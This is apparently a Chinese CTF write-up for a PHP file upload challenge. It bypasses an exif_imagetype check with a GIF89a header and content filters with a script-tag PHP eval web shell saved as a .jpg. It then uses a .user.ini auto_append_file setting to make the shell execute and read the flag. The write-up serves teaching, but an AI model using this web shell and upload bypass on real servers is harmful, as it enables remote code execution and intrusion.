打开环境
发现好像是个文件上传漏洞发现可以传jgp格式的图
但是传被过滤的的就会出现
这里就要了解一个函数
exif_imagetype
函数简介
其实就是一个类型的比较
所以这里和其他文件上传设置的黑白名单没两样
可以直接魔术头绕过就行
然后进过测试发现文件名带ph的被过滤了所以用phtm后缀l解析不行了
文件内容有<?的被过滤了
所以这里这样绕过
2.jpg
GIF89a
<script language="php"> eval($_POST[1]);</script>
上传成功了 但是没有被解析 然后这块的又没有文件包含漏洞,所以不容易被解析 所以不能用工具链接
这里就要了解另一个知识点了
神秘的.user.ini文件
先配置.user.ini再上传在它目录下进行解析
.user.ini
GIF89a
auto_append_file=1.jpg
然后再上传木马
工具链接在根目录寻找flag
也能在木马语句中直接抓flag
这样直接访问文件位置得到flag
希望这篇文章能帮到你!